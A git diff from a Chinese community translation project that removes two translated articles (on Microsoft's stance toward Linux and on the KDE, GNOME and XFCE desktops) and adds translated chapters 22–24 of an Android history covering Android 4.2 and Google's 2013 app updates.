-所以,当微软在开源大会和重大事件上拿出印有"Microsoft Loves Linux"的T-恤和徽章时,请原谅我们表现出来的震惊。这是真的吗?微软真的爱 Linux ?
-
-当然,公关的口号和免费的T-恤并不代表真理。行动胜于雄辩。当你思考一下微软的行动时,微软的立场就变得有点模棱两可了。
-
-一方面,微软招募了几百名 Linux 开发者和系统管理员。将 .NET 核心框架作为一个开源的项目进行了发布,并提供了跨平台的支持(这样 .NET 就可以跑在 OS X 和 Linux 上了)。并且,微软与 Linux 公司合作把最流行的发型版本放到了Azure平台上。事实上,微软已经走的如此之远以至于要为Azure数据中心开发自己的Linux发行版了。
-
-另一方面,微软继续直接通过法律或者傀儡公司来对开源项目进行攻击。很明显,微软在与自由软件的所有权较量上并没有发自内心的进行大的道德转变。那为什么要公开生命对Linux的钟爱之情呢?
-
-一个显而易见的事实:微软是一个经营性实体。对股东来说是一个投资工具,对雇员来说是收入来源。微软所做的只有一个终极目标:盈利。微软并没有表现出来爱或者恨(尽管这是一个最常见的指控)。
-
-所以问题不应该是"微软真的爱 Linux 吗?"相反,我们应该问,微软是怎么从这一切中获利的。
-
-让我们以 .NET 核心框架的开源发行为例。这一举动使得任何平台都很容易进入 .NET 的运行时环境。这使得微软的.NET框架所涉及到的范围远远大于Windows平台。
-
-开放 .NET 的核心包,最终使得 .NET 开发者开发跨平台的app成为可能,比如OS X,Linux甚至安卓——都基于同一个核心代码库。
-
-从开发者角度来讲,这使得.NET框架比之前更有吸引力了。能够从单一的代码库就可以触及到多个平台,使得使用.NET框架开发的任何app戏剧性的扩大了潜在的目标市场。
-
-另外,一个强大的开源社区能够提供给开发者一些代码来在他们自己的项目中进行服用。所以,开源项目的可利用性也将会成就.NET框架。
-
-更进一步讲,开放 .NET 的核心代码能够减少跨越不同平台锁产生的碎片,意味着对消费者来说有对app更广的选择。无论是开源软件还是专用的app,都有更多的选择。
-
-从微软的角度来讲,会得到一队开发者大军。微软可以通过销售培训、证书、技术支持、开发者工具(包括Visual Studio)和应用扩展来获利。
-
-我们应该自问的是,这对自由软件社区有利还是有弊?
-
-.NET 框架的大范围适用意味着许多参与竞争的开源项目的消亡,迫使我们会跟着微软的节奏走下去。
-
-先抛开.NET不谈,微软正在花费大量的精力在Linux对Azure云计算平台的支持上。要记得,Azure最初是Windows的Azure。Windows服务器是唯一能够支持Azure的操作系统。今天,Azure也提供了对多个Linux发行版的支持。
-
-关于此,有一个原因:付费给需要或者想要Linux服务的顾客。如果微软不提供Linux虚拟机,那些顾客就会跟别人合作了。
-
-看上去好像是微软意识到"Linux就在这里"的这样一个现实。微软不能真正的消灭它,所以必须接收它。
-
-这又把我们带回到那个问题:关于微软和Linux为什么有这么多的流言?我们在谈论这个问题,因为微软希望我们思考这个问题。毕竟,所有这些谈资都会追溯到微软,不管是在新闻稿、博客还是会议上的公开声明。微软在努力吸引大家对其在Linux专业知识方面的注意力。
-
-首席架构师 Kamala Subramaniam 的博文声明Azure Cloud Switch背后的其他企图会是什么?ACS是一个定制的Linux发行版。微软用它来对Azure数据中心的开关硬件进行自动配置。
-
-ACS不是公开的。它是用于Azure内部使用的。别人也不太可能找到这个发行版其他的用途。事实上,Subramaniam 在她的博文中也表述了同样的观点。
-
-所以,微软不会通过卖ACS来获利,也不会因为放弃使用而获得一个用户基础。相反,微软在Linux和Azure上花费经历,加强其在Linux云计算平台方面的地位。
-
-微软最近迷上Linux对社区来说是好消息吗?
-
-我们不应该慢慢忘记微软的"拥抱、扩展、消灭"的诅咒。现在,微软处在拥抱Linux的初期阶段。微软会通过定制扩展和专有标准来分裂社区吗?
-
-赶紧评论吧,让我们知道你是怎么想的。
-
---------------------------------------------------------------------------------
-
-via: http://www.linuxjournal.com/content/microsoft-and-linux-true-romance-or-toxic-love-0
-
-作者:[James Darvell][a]
-译者:[sonofelice](https://github.com/sonofelice)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:http://www.linuxjournal.com/users/james-darvell
\ No newline at end of file
diff --git a/translated/talk/20151202 KDE vs GNOME vs XFCE Desktop.md b/translated/talk/20151202 KDE vs GNOME vs XFCE Desktop.md
deleted file mode 100644
index bdbaf2cdbd..0000000000
--- a/translated/talk/20151202 KDE vs GNOME vs XFCE Desktop.md
+++ /dev/null
@@ -1,47 +0,0 @@
-translating by kylepeng93
-KDE,GNOME和XFCE的较量
-================================================================================
-![](http://1426826955.rsc.cdn77.org/wp-content/uploads/2013/07/300px-Xfce_logo.svg_.png)
-这么多年来,很多人一直都在他们的linux桌面端使用KDE或者GNOME桌面环境。这两个桌面环境经过多年的发展之后仍然在继续增加他们的用户基数。然而,在轻量级桌面环境下,XFCE一举成为了最受欢迎的桌面环境,相较于LXDE缺少的优美视觉效果,默认配置下的XFCE就可以在这方面打败前者。XFCE提供了用户能在GNOME2下使用的所有功能特性。但是,必须承认,在一些太老的计算机上,它的轻量级的特性并不能得到很好的效果。
-
-### 桌面主题定制 ###
-用户完成安装之后,XFCE看起来可能会有一点无聊,因为它在视觉上还缺少一些吸引力。但是,请不要误解我的话,XFCE仍然拥有漂亮的桌面,可能看起来像是用户眼中的香草,正如大多数刚刚接触XFCE桌面环境的人。好消息是当我们给XFCE安装新的主题的时候,这会是一个十分容易的过程,因为你能够快速的找到你喜欢的XFCE主题,之后,你可以将它解压到一个合适的目录中。从这一点上来说,XFCE自带的一个重要的图形界面工具可以帮助用户更加容易的选中你已经选好的主题,这可能是目前在XFCE上最好用的工具了。如果用户按照上面的指示去做的话,对于任何想要尝试使用XFCE的用户来说将不存在任何困难。
-
-在GNOME桌面上,用户也可以按照上面的方法去做。不过,其中最主要的不同点就是用户必须手动下载并安装GNOME Tweak Tool,这样才能继续你想做的事。当然,对于使用任何一种方式都不会有什么障碍,但是对于用户来说,使用XFCE安装和激活主题并不需要去额外的下载并安装任何tweak tool可能是他们无法忽略的一个优势。而在GNOME上,尤其是在用户已经下载并安装了GNOME Tweak tool之后,你仍将必须确保你已经安装了用户主题拓展。
-
-在XFCE一样,用户将会去搜索并下载自己喜欢的主题,然后,用户可以重新使用GNOME Tweak tool,并点击该工具界面左边的Appearance按钮,接着用户便可以简单的通过点击相应的按钮并选择自己已经下载好的主题来使用自己的主题,当一切都完成之后,用户将会看到一个告诉用户已经成功应用了主题的对话框,这样,你的主题便已经安装完成。对于这一点,用户可以简单的使用滚动条来选择他们想要的主题。和XFCE一样,主题激活的过程也是十分简单的,然而,对于因为要使用一个新的主题而下载一个不被包含的应用的需求也是需要考虑的。
-
-最后,就是KDE桌面主题定制的过程了。和XFCE一样,不需要去下载额外的工具来安装主题。从这点来看,让人有种XFCE必将使KDE成为最后的赢家的感觉。不仅在KDE上可以完全使用图形用户界面来安装主题,而且甚至只需要用户点击获取新主题的按钮就可以定位,查看,并且最后自动安装新的主题。
-
-然而,我们不应该认为KDE相比XFCE是一个更加稳定的桌面环境。因此,现在正是我们思考为什么一些额外的功能可能会从桌面环境中移除来达到最小化的目的。为此,我们都必须为拥有这样出色的功能而给予KDE更多的支持。
-
-### MATE不是一个轻量级的桌面环境 ###
-在继续比较XFCE,GNOME3和KDE之前,必须对这方面的老手作一个事先说明,我们不会将MATE桌面环境加入到我们的比较中。MATE可被认为是GNOME2的另一个衍生品,但是它并没有声称是作为一款轻量级或者快捷桌面。相反,它的主要目的是成为一款更加传统和舒适的桌面环境,并使它的用户感觉就像在家里使用它一样。
-
-另一方面,XFCE生来就是要实现他自己的一系列使命。XFCE给它的用户提供一个更加轻量级的桌面环境,至今仍然有着吸引人的桌面视觉体验。然后,对于一些认为MATE也是一款轻量级的桌面环境的人来说,其实MATE真正的目标并不是成为一款轻量级的桌面环境。这两个选择在各自安装了一款好的主题之后看起来都会让人觉得非常具有吸引力。
-
-### 桌面导航 ###
-XFCE在窗口之外提供了一个显眼的导航器。任何使用过传统的windows或者GNOME 2/MATE桌面环境的用户都可以在没有任何帮助的情况下自如的使用新安装的XFCE桌面环境的导航器。紧接着,添加小程序到面板中也是很明显的。和找到已经安装的应用程序一样,直接使用启动器并点击你想要运行的应用程序图标。除了LXDE和MATE之外,还没有其他的桌面的导航器可以做到如此简单。不仅如此,更加简单的是对控制面板的使用,对于刚刚使用这个新桌面的每个用户来说这是一个非常大的好处。如果用户更喜欢通过老式的方法去使用他们的桌面,对于GNOME来说,这不是一个问题。和没有最小化按钮形成的用户关注热点一样,加上其他应用布局方法,这将使新用户更加容易习惯这个风格设计。
-
-如果用户来自windows桌面环境,那么这些用户将要放弃这些习惯,因为,他们将不能简单的通过鼠标右击一下就可以将一个小程序添加到他们的工作空间的顶部。与此相反,它可以通过使用拓展来实现。GNOME中的KDE拓展是可用的,并且是非常的容易,这些容易之处体现在只需要用户简单的使用位于GNOME拓展页面上的on/off开关。用户必须清楚,只能通过访问该页面才能使用这个功能。
-
-另一方面,GNOME正在它的外观中体现它的设计理念,即为用户提供一个直观和易用的控制面板。你可能认为那并不是什么大事,但是,在我看来,它确实是我认为值得称赞并且有必要被提及的方面。KDE提供给它的用户大量传统的桌面使用体验,并通过提供相似的启动器和一种更加类似的获取软件的方式的能力来迎合来自windows的用户。添加小图标或者小程序到KDE桌面是件非常简单的事情,只需要在桌面的底部右击即可。只有在KDE的使用中才会存在的的问题,对于KDE用户寻找的很多KDE的特性实际上都是隐藏的。KDE的用户可能会指责这我的观点,但我仍然坚持我的说法。
-
-为了增加小部件,仅仅在我的面板上右击就可以看见面板选项,但是并不是安装小部件的一个快速的方法。通常在你选择面板选项之前你都不会看到添加的小部件,然后,就添加小部件吧。这对我来说不是个问题,但是后来对于一些用户来说,它变成了不必要的困惑。而使事情变得更加复杂,用户管理定位部件区域后,他们后来发现一种称为“Activities”的品牌新术语。在同一地区的小部件,但它是在自己的领域是什么。
-
-现在请不要误解我,KDE中的活动特性是很不错的,也是很有价值的,但是从可用性的角度看,为了不让新手感到困惑,它更加适合于应用在另一个目录选项。欢迎来自用户的分歧,,但为了测试这个新手对一些长时间的可以一遍又一遍的证明它是正确的。责骂放在一边,KDE添加新部件的方法的确很棒。与KDE的主题一样,用户不能通过使用提供的图形用户界面浏览和自动安装部件。这是一个神奇的功能,也可以是这样的方式去庆祝。KDE的控制面板可能和用户希望的样子不一样,它不是足够的简单。但是有一点很清楚,这将是他们致力于改进的地方。
-
-### 因此,XFCE是最好的桌面环境,对吗? ###
-我在我的计算机上使用GNOME,KDE,并在我的办公室和家里的电脑上使用Xfce。我也有一些老机器在使用Openbox和LXDE。每一个使用桌面的经验都可以给我提供一些有用的东西,可以帮助我使用每台机器,因为我认为它是合适的。对我来说,在我的心里有一个柔软的地方,因为Xfce作为一个桌面环境,我坚持使用了很多年。但在这篇文章中,我只是在写我使用电脑的日常,事实上,它是GNOME。
-这篇文章的主要思想是我还是觉得Xfce能提供好一点的用户体验,对于那些正在寻找稳定的、传统的、容易理解的桌面环境的用户来说,XFCE是理想的。欢迎您在评论部分和我们分享你的意见。
---------------------------------------------------------------------------------
-
-via: http://www.unixmen.com/kde-vs-gnome-vs-xfce-desktop/
-
-作者:[M.el Khamlichi][a]
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:http://www.unixmen.com/author/pirat9/
diff --git a/translated/talk/The history of Android/22 - The history of Android.md b/translated/talk/The history of Android/22 - The history of Android.md
new file mode 100644
index 0000000000..aabe79cfa1
--- /dev/null
+++ b/translated/talk/The history of Android/22 - The history of Android.md
@@ -0,0 +1,84 @@
+安卓编年史
+================================================================================
+### Android 4.2,果冻豆——全新 Nexus 设备,全新平板界面 ###
+
+安卓平台成熟的脚步越来越快,谷歌也将越来越多的应用托管到 Play 商店,需要通过系统更新来更新的应用越来越少。但是不间断的更新还是要继续的,2012 年 11 月,安卓 4.2 发布。4.2 还是叫做“果冻豆”,这个版本主要是一些少量变动。
+
+![LG 生产的 Nexus 4 和三星生产的 Nexus 10。](http://cdn.arstechnica.net/wp-content/uploads/2014/03/unnamed.jpg)
+LG 生产的 Nexus 4 和三星生产的 Nexus 10。
+Google/Ron Amadeo 供图
+
+和安卓 4.2 一同发布的还有两部旗舰设备,Nexus 4 和 Nexus 10,都由谷歌直接在 Play 商店出售。Nexus 4 使用了 Nexus 7 的策略,令人惊讶的低价和高质量,并且无锁设备售价 300 美元。Nexus 4 有一个 4 核 1.5GHz 骁龙 S4 Pro 处理器,2GB 内存以及 1280×768 分辨率 4.7 英寸 LCD 显示屏。谷歌的新旗舰手机由 LG 生产,并和制造商一起将关注点转向了材料和质量。Nexus 4 有着正反两面双面玻璃,这会让你爱不释手,他是有史以来触感最佳的安卓手机之一。Nexus 4 最大的缺点是没有 LTE 支持,那时候大部分手机,包括 Version Galaxy Nexus 都有更快的基带。但 Nexus 4 的需求仍大大超出了谷歌的预料——发布当日大量的流量拖垮了 Play 商店网站。手机在一小时之内销售一空。
+
+Nexus 10 是谷歌的第一部 10 英寸 Nexus 平板。该设备的亮点是 2560×1600 分辨率的显示屏,在其等级上是分辨率最高的。这背后是双核 1.7GHz Cortex A15 处理器和 2GB 内存的强力支持。随着时间一个月一个月地流逝,Nexus 10 似乎逐渐成为了第一部也是最后一部 10 英寸 Nexus 平板。通常这些设备每年都升级,但 Nexus 10 至今面世 16 个月了,可预见的未来还没有新设备的迹象。谷歌在小尺寸的 7 英寸平板上做得很出色,它似乎更倾向于让[像三星][1]这样的合作伙伴探索更大的平板家族。
+
+![新的锁屏,壁纸,以及时钟小部件设计。](http://cdn.arstechnica.net/wp-content/uploads/2014/03/JBvsjb.jpg)
+新的锁屏,壁纸,以及时钟小部件设计。
+Ron Amadeo 供图
+
+4.2 为锁屏带来了很多变化。文字居中,并且对小时使用了较大的字重,对分钟使用了较细的字体。锁屏现在是分页的,可以自定义小部件。锁屏不仅仅是一个简单的时钟,用户还可以将其替换成其它小部件或者添加额外的页面和更多的小部件。
+
+![锁屏的添加小部件页面,小部件列表,锁屏上的 Gmail 部件,以及滑动到相机。](http://cdn.arstechnica.net/wp-content/uploads/2014/03/locksc2reen.jpg)
+锁屏的添加小部件页面,小部件列表,锁屏上的 Gmail 部件,以及滑动到相机。
+Ron Amadeo 供图
+
+锁屏现在就像是一个精简版的主屏幕。页面轮廓会显示在锁屏的左右两侧来提示用户可以滑动到有其他小部件的页面。向左滑动页面会显示一个中间带有加号的简单空白页面,点击加号会打开兼容锁屏的小部件列表。锁屏每个页面限制一个小部件,将小部件向上或向下拖动可以展开或收起。最右侧的页面保留给了相机——一个简单的滑动就能打开相机界面,但是你没办法滑动回来。
+
+![新的快速设置面板以及内置应用集合。](http://cdn.arstechnica.net/wp-content/uploads/2014/03/42fix.png)
+新的快速设置面板以及内置应用集合。
+Ron Amadeo 供图
+
+4.2 最大的新增特性之一就是“快速设置”面板。安卓 3.0 为平板引入了快速改变电源设置的途径,4.2 终于将这种能力带给了手机。通知中心右上角加入了一枚新图标,可以在正常的通知列表和新的快速设置之间切换。快速设置提供了对屏幕亮度,网络连接,电池以及数据用量更加快捷的访问,而不用打开完整的设置界面。安卓 4.1 中顶部的设置按钮移除掉了,快速设置中添加了一个按钮来替代它。
+
+应用抽屉和 4.2 中的应用阵容有很多改变。得益于 Nexus 4 更宽的屏幕横纵比(5:3,Galaxy Nexus 是 16:9),应用抽屉可以显示一行五个应用图标的方阵。4.2 将自带的浏览器替换为了 Google Chrome,自带的日历换成了 Google Calendar,他们都带来了新的图标设计。时钟和相机应用在 4.2 中经过了重制,新的图标也是其中的一部分。“Google Settings”是个新应用,用于提供对系统范围内所有存在的谷歌账户设置的快捷方式,它有着和 Google Search 和 Google+ 图标一致的风格。谷歌地图拥有了新图标,谷歌纵横,以往是谷歌地图的一部分,作为对 Google+ location 的支持在这个版本退役。
+
+![浏览器替换为 Chrome,带有全屏取景器的新相机界面。](http://cdn.arstechnica.net/wp-content/uploads/2014/03/chroemcam.jpg)
+浏览器替换为 Chrome,带有全屏取景器的新相机界面。
+Ron Amadeo 供图
+
+原自带浏览器在一段时间内对 Chrome 的模仿上下了不少功夫——它引入了许多 Chrome 的界面元素,许多 Chrome 的特性,甚至还使用了 Chrome 的 javascript 引擎——但安卓 4.2 来临的时候,谷歌认为安卓版的 Chrome 已经准备好替代这个模仿者了。表面上看起来没有多大不同;界面看起来不一样,而且早期版本的 Chrome 安卓版滚动起来没有原浏览器顺畅。不过深层次来说,一切都不一样。安卓的主浏览器开发现在由 Google Chrome 团队负责,而不是作为安卓团队的子项目存在。安卓的默认浏览器从绑定安卓版本发布停滞不前的应用变成了不断更新的 Play 商店应用。现在甚至还有一个每个月接收一些更新的 beta 通道。
+
+相机界面经过了重新设计。它现在完全是个全屏应用,显示摄像头的实时图像并且在上面显示控制选项。布局审美和安卓 1.5 的[相机设计][2]有很多共同之处:带对焦的最小化的控制放置在取景器显示之上。中间的控制环在你长按屏幕或点击右下角圆形按钮的时候显示。你的手指保持在屏幕上时,你可以滑动来选择环上的选项,通常是展开进入一个子菜单。在高亮的选项上释放手指选中它。这灵感很明显来自于安卓 4.0 浏览器中的快速控制,但是将选项安排在一个环上意味着你的手指几乎总会挡住一部分界面。
+
+![时钟应用,从一个只有两个界面的应用变成功能强大,实用的应用。](http://cdn.arstechnica.net/wp-content/uploads/2014/03/clock-1.jpg)
+时钟应用,从一个只有两个界面的应用变成功能强大,实用的应用。
+Ron Amadeo 供图
+
+时钟应用经过了完整的改造,从一个简单的两个界面的闹钟,到一个世界时钟,闹钟,定时器,以及秒表俱全。时钟应用的设计和谷歌之前引入的完全不同,有着极简审美和红色高亮。它看起来像是谷歌的一个试验。甚至是几个版本之后,这个设计语言似乎也仅限于这个应用。
+
+时钟的时间选择器是经过特别精心设计的。它显示一个简单的数字盘,会智能地禁用会导致无效时间的数字。设置闹钟时间也不可能没有隐式选择选择的 AM 和 PM,永远地解决了不小心将 9am 的闹钟设置成 9pm 的问题。
+
+![平板的新系统界面使用了延展版的手机界面。](http://cdn.arstechnica.net/wp-content/uploads/2014/03/tablet2.jpg)
+平板的新系统界面使用了延展版的手机界面。
+Ron Amadeo 供图
+
+安卓 4.2 中最有争议的改变是平板界面,从单独一个统一的底部系统栏变成带有顶部状态栏和底部系统栏的双栏设计。新设计统一了手机和平板的界面,但批评人士说将手机界面延展到 10 英寸的横向平板上是浪费空间。因为导航按键现在拥有了整个底栏,所以他们像手机界面那样被居中。
+
+![平板上的多用户,以及新的手势键盘。](http://cdn.arstechnica.net/wp-content/uploads/2014/03/2014-03-06-14.55.png)
+平板上的多用户,以及新的手势键盘。
+Ron Amadeo 供图
+
+在平板上,安卓 4.2 带来了多用户支持。在设置里,新增了“用户”部分,你可以在这里管理一台设备上的用户。设置在每个用户账户内完成,安卓会给每个用户保存单独的设置,主屏幕,应用以及应用数据。
+
+4.2 还添加了有滑动输入能力的键盘。用户可以将手指一直保持在屏幕上,按顺序在字母按键上滑动来输入,而不用像以前那样一个一个字母单独地输入。
+
+----------
+
+![Ron Amadeo](http://cdn.arstechnica.net/wp-content//uploads/authors/ron-amadeo-sq.jpg)
+
+[Ron Amadeo][a] / Ron是Ars Technica的评论编缉,专注于安卓系统和谷歌产品。他总是在追寻新鲜事物,还喜欢拆解事物看看它们到底是怎么运作的。
+
+[@RonAmadeo][t]
+
+--------------------------------------------------------------------------------
+
+via: http://arstechnica.com/gadgets/2014/06/building-android-a-40000-word-history-of-googles-mobile-os/22/
+
+译者:[alim0x](https://github.com/alim0x) 校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](http://linux.cn/) 荣誉推出
+
+[1]:http://arstechnica.com/gadgets/2014/01/hands-on-with-samsungs-notepro-and-tabpro-new-screen-sizes-and-magazine-ui/
+[2]:http://cdn.arstechnica.net/wp-content/uploads/2013/12/device-2013-12-26-11016071.png
+[a]:http://arstechnica.com/author/ronamadeo
+[t]:https://twitter.com/RonAmadeo
diff --git a/translated/talk/The history of Android/23 - The history of Android.md b/translated/talk/The history of Android/23 - The history of Android.md
new file mode 100644
index 0000000000..a6693ee6ec
--- /dev/null
+++ b/translated/talk/The history of Android/23 - The history of Android.md
@@ -0,0 +1,57 @@
+安卓编年史
+================================================================================
+![Play 商店又一次重新设计!这一版非常接近现在的设计,卡片结构让改变布局变得易如反掌。](http://cdn.arstechnica.net/wp-content/uploads/2014/03/get-em-Kirill.jpg)
+Play 商店又一次重新设计!这一版非常接近现在的设计,卡片结构让改变布局变得易如反掌。
+Ron Amadeo 供图
+
+### 周期外更新——谁需要一个新系统? ###
+
+在安卓 4.2 和安卓 4.3 之间,谷歌进行了一次周期外更新,显示了有多少安卓可以不经过费力的 OTA 更新而得到改进。得益于[谷歌 Play 商店和 Play 服务][1],这些更新可以在不更新任何系统核心组件的前提下送达。
+
+2013 年 4 月,谷歌发布了谷歌 Play 商店的一个主要设计改动。就如同在这之后的大多数重新设计,新的 Play 商店完全接受了 Google Now 审美,即在灰色背景上的白色卡片。操作栏基于当前页面内容部分更改颜色,由于首屏内容以商店的各部分为主,操作栏颜色是中性的灰色。导航至内容部分的按钮指向热门付费,在那下面通常是一块促销内容或一组推荐应用。
+
+![独立的内容部分有漂亮的颜色。](http://cdn.arstechnica.net/wp-content/uploads/2014/03/content-rainbow.jpg)
+独立的内容部分有漂亮的颜色。
+Ron Amadeo 供图
+
+新的 Play 商店展现了谷歌卡片设计语言的真正力量,在所有的屏幕尺寸上能够拥有响应式布局。一张大的卡片能够和若干小卡片组合,大屏幕设备能够显示更多的卡片,而且相对于拉伸来适应横屏模式,可以通过在一行显示更多卡片来适应。Play 商店的内容编辑们也可以自由地使用卡片布局;需要关注的大更新可以获得更大的卡片。这个设计最终会慢慢渗透向其它谷歌 Play 内容应用,最后拥有一个统一的设计。
+
+![Hangouts 取代了 Google Talk,现在仍由 Google+ 团队继续开发。](http://cdn.arstechnica.net/wp-content/uploads/2014/03/talkvhangouts2.jpg)
+Hangouts 取代了 Google Talk,现在仍由 Google+ 团队继续开发。
+Ron Amadeo 供图
+
+Google I/O,谷歌的年度开发者会议,通常会宣布一个新的安卓版本。但是 2013 年的会议,谷歌只是发布了一些改进而没有系统更新。
+
+谷歌宣布的大事件之一是 Google Talk 的更新,谷歌的即时消息平台。在很长一段时间里,谷歌随安卓附四个文本交流应用:Google Talk,Google+ Messenger,信息(短信应用),Google Voice。拥有四个应用来完成相同的任务——给某人发送文本消息——对用户来说很混乱。在 I/O 上,谷歌结束了 Google Talk 并且从头开始创建全新的消息产品 [Google Hangouts][2]。虽然最初只是想替代 Google Talk,Hangouts 的计划是统一所有谷歌的不同的消息应用到统一的界面下。
+
+Hangouts 的用户界面布局真的和 Google Talk 没什么大的差别。主页面包含你的聊天会话,点击某一项就能进入聊天页面。界面设计上有所更新,聊天页面现在使用了卡片风格来显示每个段落,并且聊天列表是个“抽屉”风格的界面,这意味着你可以通过水平滑动打开它。Hangouts 有已读回执和输入状态指示,并且群聊现在是个主要特性。
+
+Google+ 是 Hangouts 的中心,所以产品的全名实际上是“Google+ Hangouts”。Hangouts 完全整合到了 Google+ 桌面站点。身份和头像直接从 Google+ 拉取,点击头像会打开用户的 Google+ 资料。和将浏览器换为 Google Chrome 类似,核心安卓功能交给了一个单独的团队——Google+ 团队——作为对应用成为繁忙的安卓工程师的副产品的反对。随着 Google+ 团队的接手,安卓的主要即时通讯客户端现在成为一个持续开发的应用。它被放进了 Play 商店并且有稳定的更新频率。
+
+![新导航抽屉界面。](http://cdn.arstechnica.net/wp-content/uploads/2014/03/navigation_drawer_overview1.png)
+新导航抽屉界面。
+图片来自 [developer.android.com][3]
+
+谷歌还给操作栏引入了新的设计元素:导航抽屉。这个抽屉显示为在左上角应用图标旁的三道横线。点击或从屏幕左边缘向右滑动,会出现一个侧边菜单目录。就像名字所指明的,这个是用来应用内导航的,它会显示若干应用内的顶层位置。这使得应用首屏可以用来显示内容,也给了用户一致的,易于访问的导航元素。导航抽屉基本上就是个大号的菜单,可以滚动并且固定在左侧。
+
+----------
+
+![Ron Amadeo](http://cdn.arstechnica.net/wp-content//uploads/authors/ron-amadeo-sq.jpg)
+
+[Ron Amadeo][a] / Ron是Ars Technica的评论编缉,专注于安卓系统和谷歌产品。他总是在追寻新鲜事物,还喜欢拆解事物看看它们到底是怎么运作的。
+
+[@RonAmadeo][t]
+
+--------------------------------------------------------------------------------
+
+via: http://arstechnica.com/gadgets/2014/06/building-android-a-40000-word-history-of-googles-mobile-os/23/
+
+译者:[alim0x](https://github.com/alim0x) 校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](http://linux.cn/) 荣誉推出
+
+[1]:http://arstechnica.com/gadgets/2013/09/balky-carriers-and-slow-oems-step-aside-google-is-defragging-android/
+[2]:http://arstechnica.com/information-technology/2013/05/hands-on-with-hangouts-googles-new-text-and-video-chat-architecture/
+[3]:https://developer.android.com/design/patterns/navigation-drawer.html
+[a]:http://arstechnica.com/author/ronamadeo
+[t]:https://twitter.com/RonAmadeo
diff --git a/translated/talk/The history of Android/24 - The history of Android.md b/translated/talk/The history of Android/24 - The history of Android.md
new file mode 100644
index 0000000000..71d1736a12
--- /dev/null
+++ b/translated/talk/The history of Android/24 - The history of Android.md
@@ -0,0 +1,83 @@
+安卓编年史
+================================================================================
+![漂亮的新 Google Play Music 应用,从电子风格转向完美契合 Play 商店的风格。](http://cdn.arstechnica.net/wp-content/uploads/2014/03/Goooogleplaymusic.jpg)
+漂亮的新 Google Play Music 应用,从电子风格转向完美契合 Play 商店的风格。
+Ron Amadeo 供图
+
+在 I/O 大会推出的另一个应用更新是 Google Music 应用。音乐应用经过了完全的重新设计,最终摆脱了蜂巢中引入的蓝底蓝色调的设计。Play Music 的设计和几个月前发布的 Play 商店一致,有着响应式的白色卡片布局。Music 同时还是最早采用新抽屉导航样式的主要应用之一。谷歌还随新应用发布了 Google Play Music All Access,每月 10 美元的包月音乐订阅服务。Google Music 现在拥有订阅计划,音乐购买,以及云端音乐存储空间。这个版本还引入了“Instant Mix”,谷歌会在云端给相似的歌曲计算出一份歌单。
+
+![一个展示对 Google Play Games 支持的游戏。上面是 Play 商店游戏特性描述,登陆游戏触发的权限对话框,Play Games 通知,以及成就界面。](http://cdn.arstechnica.net/wp-content/uploads/2014/03/gooooogleplaygames.jpg)
+一个展示对 Google Play Games 支持的游戏。上面是 Play 商店游戏特性描述,登陆游戏触发的权限对话框,Play Games 通知,以及成就界面。
+Ron Amadeo 供图
+
+谷歌还引入了“Google Play Games”,一个后端服务,开发者可以将其附加到游戏中。这项服务简单说就是安卓版的 Xbox Live 或苹果的 Game Center。开发者可以给游戏添加 Play Games 支持,这样就能通过使用谷歌的后端服务,更简单地集成成就,多人游戏,游戏匹配,用户账户以及云端存档到游戏中。
+
+Play Games 是谷歌在游戏方面推进的开始。就像单独的 GPS 设备,翻盖手机,以及 MP3 播放器,智能手机的生产者希望游戏设备能够变成智能手机的一个功能点。当你有部智能手机的时候你为什么还有买个任天堂 DS 或 PS Vita 呢?一个易于使用的多人游戏服务是这项计划的重要部分,我们仍能看到这个决定最后的成果。在今天,坊间都在传言谷歌和苹果有关于客厅游戏设备的计划。
+
+![Google Keep,谷歌自 Google Notebook 以来第一个笔记服务。](http://cdn.arstechnica.net/wp-content/uploads/2014/03/goooglekeep.jpg)
+Google Keep,谷歌自 Google Notebook 以来第一个笔记服务。
+Ron Amadeo 供图
+
+毫无疑问一些产品为了赶上 Google I/O 大会的发布准时开发完成了,[但是三个半小时内的主题][1]已经够多了,一些产品在大会的发布上忽略了。Google I/O 大会的三天后一切都清楚了,谷歌带来了 Google Keep,一个用于安卓和在线的笔记应用。Keep 看起来很简单,就是一个用上了响应式 Google-Now 风格设计的笔记应用。用户可以改变卡片的尺寸,从多栏布局改为单列视图。笔记可以由文本,清单,自动转文本的语音或者图片组成。笔记卡片可以拖动并在主界面重新组织,你甚至可以给笔记换个颜色。
+
+![Gmail 4.5,换上了新的导航抽屉设计,去掉了几个按钮并将操作栏合并到了抽屉里。](http://cdn.arstechnica.net/wp-content/uploads/2014/05/gmail.png)
+Gmail 4.5,换上了新的导航抽屉设计,去掉了几个按钮并将操作栏合并到了抽屉里。
+Ron Amadeo 供图
+
+在 I/O 大会之后,没有哪些应用不在谷歌的周期外更新里。2013 年 6 月,谷歌发布了新版设计的 Gmail。最显眼的变化就是一个月前 Google I/O 大会引入的新导航抽屉界面。最吸引眼球的变化是用上了 Google+ 资料图片来取代复选框。虽然复选框看起来被去掉了,它们其实还在那,点击邮件左边的图片就是了。
+
+![新谷歌地图,换上了全白的 Google-Now 风格主题。](http://cdn.arstechnica.net/wp-content/uploads/2014/03/newmaps11.png)
+新谷歌地图,换上了全白的 Google-Now 风格主题。
+Ron Amadeo 供图
+
+一个月后,谷歌在 Play 商店发布了全新的谷歌地图。这是谷歌地图自冰淇淋三明治以来第一个经过细致地重新设计的版本。新版本完全适配了 Google Now 白色卡片审美,还大大减少了屏幕上显示的元素。新版谷歌地图似乎设计时有意使地图总是显示在屏幕上,你很难找到除了设置页面之外还能完全覆盖地图显示的选项。
+
+这个版本的谷歌地图看起来活在它自己的小小设计世界中。白色的搜索栏“浮动”在地图之上,地图显示部分在它旁边和上面都有。这和传统的操作栏设计有所不同。一般在应用左上角的导航抽屉,在这里是在左下角。这里的主界面没有向上按钮,应用图标,也没有浮动按钮。
+
